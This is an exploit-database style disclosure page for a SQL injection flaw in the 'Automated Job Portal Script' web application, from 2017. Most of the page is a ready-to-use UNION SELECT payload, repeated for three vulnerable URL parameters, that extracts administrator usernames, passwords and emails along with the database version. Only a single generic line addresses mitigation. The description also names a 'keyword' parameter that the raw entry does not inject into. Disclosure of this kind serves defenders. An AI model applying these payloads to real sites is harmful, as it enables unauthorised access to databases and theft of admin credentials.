Automated Job Portal Script - SQL Injection

vendor:

Automated Job Portal Script

by:

Ihsan Sencan

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Automated Job Portal Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win7 x64, Kali Linux x64

2017

Automated Job Portal Script – SQL Injection

Automated Job Portal Script is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames, passwords, emails, etc. from the database. The vulnerable parameters are 'id', 'keyword', and 'co' in the jobdetail.php, search.php, and search.php files respectively. The exploit code is '-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -

Mitigation:

Input validation should be used to prevent SQL Injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Automated Job Portal Script - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://www.jagaad.com/
# Software Buy: https://codecanyon.net/item/automated-job-portal-script/14318664
# Demo: http://www.jagaad.com/demo/php/automated-job-portal/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/jobdetail.php?id=[SQL]
-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
# 
# http://localhost/[PATH]/search.php?keyword=1&location=[SQL]
-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
# 
# http://localhost/[PATH]/search.php?keyword=a&location=&co=[SQL]
-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -